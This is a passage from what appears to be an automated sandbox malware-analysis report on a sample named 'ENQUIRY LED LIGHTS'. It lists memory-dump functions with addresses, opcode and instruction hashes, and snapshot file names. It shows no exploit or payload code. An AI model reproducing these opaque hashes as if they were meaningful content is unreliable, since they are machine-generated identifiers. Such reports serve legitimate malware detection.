                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                  • Instruction ID: 866b9c4ab914b82c3458a1e470f4d5e751bd399b666afe43005dc2f0deef30f8
                                                                                                  • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                  • Instruction Fuzzy Hash: 80115E32A00604EFEF21DF85CC40F56B7AAEF457D8F05846AEA499B160DB72DD40DB90
                                                                                                  Function 02F327ED Relevance: .1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d3305fbf29df8b67ba9d78ae9450bbda94b7a545bf885ff5ebce7c323280e982
                                                                                                  • Instruction ID: c9726deca4c48748d3bab4b26f24f2e37712e5246b832fd24ee8c74f965bec8d
                                                                                                  • Opcode Fuzzy Hash: d3305fbf29df8b67ba9d78ae9450bbda94b7a545bf885ff5ebce7c323280e982
                                                                                                  • Instruction Fuzzy Hash: 9101C472B06644AFE316A2699C84F2B769DEF417D4F4A00B6FB019B291DB54DC00C6A1
                                                                                                  Function 02F14690 Relevance: .1, Instructions: 57COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 897763eddc14bb86a3cddc9309e6fafe5f7b927a31628e6ec3c9607a41c685bf
                                                                                                  • Instruction ID: d2dd0bd340381787822d0b9e0aae049863da6a371e81b45ab8998724aa9bb299
                                                                                                  • Opcode Fuzzy Hash: 897763eddc14bb86a3cddc9309e6fafe5f7b927a31628e6ec3c9607a41c685bf
                                                                                                  • Instruction Fuzzy Hash: A111AC36640748AFDB25DF59D880F5677B9EFC6BA8F804119FA059B250C771E840CF60
                                                                                                  Function 02F46620 Relevance: .1, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 29a6e00d7ad5c08eca39d1e69fa86213619e27256aea1e3d4e1ba913cdb902c1
                                                                                                  • Instruction ID: 83d0f1c66847453d9b37898929cd3a32e96676672493beaed0d8c69e30199393
                                                                                                  • Opcode Fuzzy Hash: 29a6e00d7ad5c08eca39d1e69fa86213619e27256aea1e3d4e1ba913cdb902c1
                                                                                                  • Instruction Fuzzy Hash: 1811C272E00615ABDB21DF58DD80B5EFBBDEF89794F900054DA01AB200CB74AD058F50
                                                                                                  Function 02F3EA2E Relevance: .1, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 91a5acaa133d3c225dd17de542900905686e8b0815c336bbe353c29ac0b6982d
                                                                                                  • Instruction ID: a6c0ba9283e50b8dded017e4e624925f94eea79b3d1a4e189b7825432df4be2b
                                                                                                  • Opcode Fuzzy Hash: 91a5acaa133d3c225dd17de542900905686e8b0815c336bbe353c29ac0b6982d
                                                                                                  • Instruction Fuzzy Hash: 0401B5715051099FDB16DF15DC48F56BBFAEF86358F20816AE2058B2A0C7B4EC45CF90
                                                                                                  Function 02F3E53E Relevance: .1, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                  • Instruction ID: 10e65e75f53fad4d6bddda411f5dd238187663923ed28b1f29ed80a15d8f9701
                                                                                                  • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                  • Instruction Fuzzy Hash: FD118E73B016C59BE7239B28D954B2577E4EF417D8F1901E2EB42CBB92E728C842C651
                                                                                                  Function 02F9E75D Relevance: .1, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                  • Instruction ID: c5cc044ee0fe2089770007f8684c1da62f5f5271fe1e985412eaf24835f228c7
                                                                                                  • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                  • Instruction Fuzzy Hash: E501C032A00108AFEB21DB54CC00B5A77AAEF417D4F058526EB159B260E772DD40CB92
                                                                                                  Function 02F0A250 Relevance: .1, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                  • Instruction ID: 3a483c1ff47ec7adff816606d658b21a538c11c71b3ab759a7fdf4f802baec0c
                                                                                                  • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                  • Instruction Fuzzy Hash: B601D272905B159BCB308F15D880A767BA5EF49BE07508A3DFF958B6C0D731D800EBA0
                                                                                                  Function 02F16259 Relevance: .1, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 600f638aacca0ae1ade96da30b6eeb28acc1229229013b8c48b371c5333c4312
                                                                                                  • Instruction ID: c076b6f662c6e58d06984933f2050a1a657bace82a6c3c7e3563d5c7054499e2
                                                                                                  • Opcode Fuzzy Hash: 600f638aacca0ae1ade96da30b6eeb28acc1229229013b8c48b371c5333c4312
                                                                                                  • Instruction Fuzzy Hash: AB117071941628ABDF25EF64CC41FE9B3BAAF04750F5041D5AB14E60E0DB709E81CF84
                                                                                                  Function 02F8E1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fa82805732b7ee9f465f4e2c1536b5c92988fc423d95d5a70d5bc874f0c40d18
                                                                                                  • Instruction ID: 30138c427a48765313756f227520420484619d38478a329f6004948ffcc9b4c5
                                                                                                  • Opcode Fuzzy Hash: fa82805732b7ee9f465f4e2c1536b5c92988fc423d95d5a70d5bc874f0c40d18
                                                                                                  • Instruction Fuzzy Hash: EC117932641240EFCB16AF18CD90F16BBB9FF48B98F2000A5FA059B6A1C335E901CA90
                                                                                                  Function 02F1208A Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                  • Instruction ID: d29d2b92864d1c5c9a91ea4f8423d4e1c5b02c7145655109edcfb52f8ffc6a81
                                                                                                  • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                  • Instruction Fuzzy Hash: CA01D833A001208BDF159A59DC84B627766FFC4B90F9546A5EF068F249DB71D881C790
                                                                                                  Function 02F96050 Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 680da11290251dcb1ca0007541a6d685640f4ab1a507c092ff577de40706342b
                                                                                                  • Instruction ID: fd5c80aa04cb739cb499b076e7d8c0c6b0d078c4c23bb26e6f106f2779733d3c
                                                                                                  • Opcode Fuzzy Hash: 680da11290251dcb1ca0007541a6d685640f4ab1a507c092ff577de40706342b
                                                                                                  • Instruction Fuzzy Hash: 08111B73900019ABCF15DB94CC84DDF7B7DEF48358F044166AA06E7210EA34AA54CBA0
                                                                                                  Function 02FA6500 Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6efe3fe70b202e213131229abc77a0ccb58476c3392261f5c2dc0e6e7359f3cd
                                                                                                  • Instruction ID: b4690460fc7cb3a42303713d2942c2092008e0c83d1f46e278f60907cf75ac0d
                                                                                                  • Opcode Fuzzy Hash: 6efe3fe70b202e213131229abc77a0ccb58476c3392261f5c2dc0e6e7359f3cd
                                                                                                  • Instruction Fuzzy Hash: 8D1104B26041459FCB00CF58C810BA2B7BAFF4A344F0C8159EA48CB315D732EC80CBA0
                                                                                                  Function 02FBEA60 Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf64f2b2e2dfa707301b0314c4a6c02732f12a961507ae2108f891604a441404
                                                                                                  • Instruction ID: 1dadf657837e6a46c4f16eded3ff47fa888ac08b1e3d63b7b642073ffd9d8ada
                                                                                                  • Opcode Fuzzy Hash: bf64f2b2e2dfa707301b0314c4a6c02732f12a961507ae2108f891604a441404
                                                                                                  • Instruction Fuzzy Hash: BB01B5359411209BC733AB12C850AEAB7AEFF437D0B84846EE7445B650C7309C41CF91
                                                                                                  Function 02F9C810 Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 32253d4cec1fe08f42316ebbc15d01e7c24ce05556f6c67ad546e8167a831923
                                                                                                  • Instruction ID: 5447da8a86713d5dfe6a61d80de9d94048b54dd4cfeb51465295aafaef8d1fe9
                                                                                                  • Opcode Fuzzy Hash: 32253d4cec1fe08f42316ebbc15d01e7c24ce05556f6c67ad546e8167a831923
                                                                                                  • Instruction Fuzzy Hash: 2A11E8B1E002199BCB04DFA9D545AAEB7F9EF48340F50406ABA05E7351D674EA01CBA4
                                                                                                  Function 02F520F0 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 516fe4ef57b578bc1e74fb8ee4b9836ac741595b500fd05c75789151ecfec04b
                                                                                                  • Instruction ID: f570c408b89f4985c5bce280b11a8343db1060e357d48c9699cea9e5f9e5d09e
                                                                                                  • Opcode Fuzzy Hash: 516fe4ef57b578bc1e74fb8ee4b9836ac741595b500fd05c75789151ecfec04b
                                                                                                  • Instruction Fuzzy Hash: FF115B71A0121CABDB14EF64C850BAEBBB6EB44784F004059EF0197290DA35AA11CF90
                                                                                                  Function 02F0C020 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                  • Instruction ID: cc1d9f0d00a181feb65262bdccc991c75ad5231426b8a8c4c47b41bb5217f7ce
                                                                                                  • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                  • Instruction Fuzzy Hash: C201D2326007449BDF229665C944EA777AAEBC4794F04451AAB468BA40DB70E801CB50
                                                                                                  Function 02F4E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fc2c33b59301148dc590e75b1ae31362e2686de30630e2a94995d5468cc6ec33
                                                                                                  • Instruction ID: a22631ad14eb049f2c5807493e5a9a7b520cef1475b99e20fe0b56409fbb3629
                                                                                                  • Opcode Fuzzy Hash: fc2c33b59301148dc590e75b1ae31362e2686de30630e2a94995d5468cc6ec33
                                                                                                  • Instruction Fuzzy Hash: F301DF72201A14BFC311BB28CD80E17B7EDFF8A7E4B000625B60487651DB64EC15CAA0
                                                                                                  Function 02FA69C0 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1844061db039ad46de92c48a78320456a35b3b64ea021fe96038c016a359997a
                                                                                                  • Instruction ID: ebba5c4c5e9320d930c950bc2e7c49e254f1d0f37dc12d9366544a3d39882a01
                                                                                                  • Opcode Fuzzy Hash: 1844061db039ad46de92c48a78320456a35b3b64ea021fe96038c016a359997a
                                                                                                  • Instruction Fuzzy Hash: E1014C722142119BC724DF78C848967B7ACEF847A4F144129FA1AC71D0E7309941CBD1
                                                                                                  Function 02F9C460 Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ee65df67b465815d4bd1f164b9a9323c39df07c260ae3f8f9277890af55f5a2b
                                                                                                  • Instruction ID: 53cebc38f8cbab6f930e8d40c0a4e1d168ecea180d0f1c6cfbb0d661e4e1cce2
                                                                                                  • Opcode Fuzzy Hash: ee65df67b465815d4bd1f164b9a9323c39df07c260ae3f8f9277890af55f5a2b
                                                                                                  • Instruction Fuzzy Hash: E9115B71A0120CABDF15EF68C944EAE7BB6EB49384F00405ABE0197380DA34E951CB90
                                                                                                  Function 02FE4A80 Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                  • Instruction ID: d7a44787e092905d693a5aba36b5cf59f81a00ed1706e5cafbb58978aa20b5d4
                                                                                                  • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                  • Instruction Fuzzy Hash: 5A01B5326006059FDB229E59D840F56B7EAFBC5A94F04445DE7438B690DA70F850DB94
                                                                                                  Function 02F9CA11 Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b4ba43e84ddd6af958e3ca089e1f415a22b7140d9a9cd415146f701504357eb0
                                                                                                  • Instruction ID: 50c44a061ec581c2e962c4f39ce99e38086888f85a7d94e364910e31f3c3e698
                                                                                                  • Opcode Fuzzy Hash: b4ba43e84ddd6af958e3ca089e1f415a22b7140d9a9cd415146f701504357eb0
                                                                                                  • Instruction Fuzzy Hash: 97118EB1A083089FC700DF69C84194BBBE4EF89790F00455FFA58D7350E630E900CB92
                                                                                                  Function 02F9C97C Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 867b3c3accade4d54eef983e0f1eec20c7fd5f88f53f93b364b3028ad7358d2f
                                                                                                  • Instruction ID: c1fe18978af0d4dd06e8f3d35c6e13f332e9c826c409935794314464f034743b
                                                                                                  • Opcode Fuzzy Hash: 867b3c3accade4d54eef983e0f1eec20c7fd5f88f53f93b364b3028ad7358d2f
                                                                                                  • Instruction Fuzzy Hash: C9118BB1A083089FC700DF69C841A5BBBE4EF88750F00455FFA98D7391E630E900CBA2
                                                                                                  Function 02F0826B Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e04d6155f0a7ff9eee0268828a352589e68d4a26f8e409c946eaa194dc3805e6
                                                                                                  • Instruction ID: ce04b7172229615318330a702ec5da9dfcbf37c8d75c116b2741df06c1640941
                                                                                                  • Opcode Fuzzy Hash: e04d6155f0a7ff9eee0268828a352589e68d4a26f8e409c946eaa194dc3805e6
                                                                                                  • Instruction Fuzzy Hash: 6301F736B01908DBDB04EB75DC849AFB7B9EF843E4F1540699B05A7284DE20DC01C691
                                                                                                  Function 02F2E016 Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                  • Instruction ID: 85862d8391a6625583d1e8df6c08c844a62a33721e9030f84527273f1ac71072
                                                                                                  • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                  • Instruction Fuzzy Hash: 230156726006949BD322C61DC948F3677ECEB46B94F1D04A1FA09CB6A1D778EC45C621
                                                                                                  Function 02FBEB50 Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: d4d7a1daf9d1a6d2eb20b9ff94f7e1d6fb5c6fefa6429a944a12d1d1b6e1958f
                                                                                                  • Instruction ID: 91a83dc46582884ebd039f1199e1867016be9807c82cab1dcbca582dcc5f750b
                                                                                                  • Opcode Fuzzy Hash: d4d7a1daf9d1a6d2eb20b9ff94f7e1d6fb5c6fefa6429a944a12d1d1b6e1958f
                                                                                                  • Instruction Fuzzy Hash: 4A01DF71681A10AFD3329B16D840B86BAE9DF45B94F00442AA70A9F390D7B098408F84
                                                                                                  Function 02F12582 Relevance: .0, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 841879e67ee13797790079853e86b09d57b3fb69fcc3df3c829524a01ecc73e5
                                                                                                  • Instruction ID: 348cdbb6eff76b97a58d5dd2a9d341f958de0d538ac94a9f0d33a46ce74ac2a5
                                                                                                  • Opcode Fuzzy Hash: 841879e67ee13797790079853e86b09d57b3fb69fcc3df3c829524a01ecc73e5
                                                                                                  • Instruction Fuzzy Hash: E1F0F933B41A24B7C7319B968D90F177AAEDB84BD0F104028BB0697640DA30ED01CBA0
                                                                                                  Function 02F0C310 Relevance: .0, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                  • Instruction ID: f6f2b77a06c8aa1debeb3db2a579335fbc90375481b4107d266a1464df3d9e2c
                                                                                                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                  • Instruction Fuzzy Hash: 16F0FC736546329BCB3216594CC0B2BF5968FC5BE4F190237E3059B2C4CA64CC01B7D5
                                                                                                  Function 02F3C073 Relevance: .0, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                  • Instruction ID: 8c5cbe9c413a603073ec5574fe2988ff4e0b138958f5923e1c15e759ff8955a5
                                                                                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                  • Instruction Fuzzy Hash: 61F0C2F2A00A20ABD329CF4DDC40E67F7EADFC0B80F048129A605DB220EA31DD04CB90
                                                                                                  Function 02F4CA6F Relevance: .0, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
